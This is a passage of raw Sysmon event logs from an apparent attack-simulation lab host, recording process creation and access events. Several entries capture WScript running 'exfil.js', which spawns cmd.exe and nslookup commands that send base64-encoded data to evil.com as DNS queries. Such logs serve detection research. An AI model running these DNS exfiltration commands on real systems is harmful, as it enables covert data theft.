EM32\ntdll.dll+51791 10341000x8000000000000000212147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.167{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-F144-000000005F02}488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.167{2E1864BB-18F5-629A-EF44-000000005F02}9247444C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-F144-000000005F02}488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.176{2E1864BB-18F5-629A-F144-000000005F02}488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-EF44-000000005F02}924C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltazudau.tmp 2>&1 10341000x8000000000000000212144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.152{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-F044-000000005F02}5100C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.152{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-F044-000000005F02}5100C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.152{2E1864BB-18F5-629A-F044-000000005F02}51006416C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-EF44-000000005F02}924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.136{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-F044-000000005F02}5100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.136{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.136{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.136{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.136{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.136{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-EF44-000000005F02}924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.136{2E1864BB-18E0-629A-6742-000000005F02}3976652C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-EF44-000000005F02}924C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.144{2E1864BB-18F5-629A-EF44-000000005F02}924C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltazudau.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000212133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.121{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.121{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000212131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.121{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljtqoo.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.089{2E1864BB-18F5-629A-ED44-000000005F02}65806076C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-EE44-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.089{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.089{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.089{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.089{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.089{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-EE44-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.089{2E1864BB-18F5-629A-EC44-000000005F02}4580988C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-EE44-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.092{2E1864BB-18F5-629A-EE44-000000005F02}8104C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-EC44-000000005F02}4580C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljtqoo.tmp 2>&1 10341000x8000000000000000212122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.051{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-ED44-000000005F02}6580C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.051{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-ED44-000000005F02}6580C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.036{2E1864BB-18F5-629A-ED44-000000005F02}65806076C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-EC44-000000005F02}4580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.036{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-ED44-000000005F02}6580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.020{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.020{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 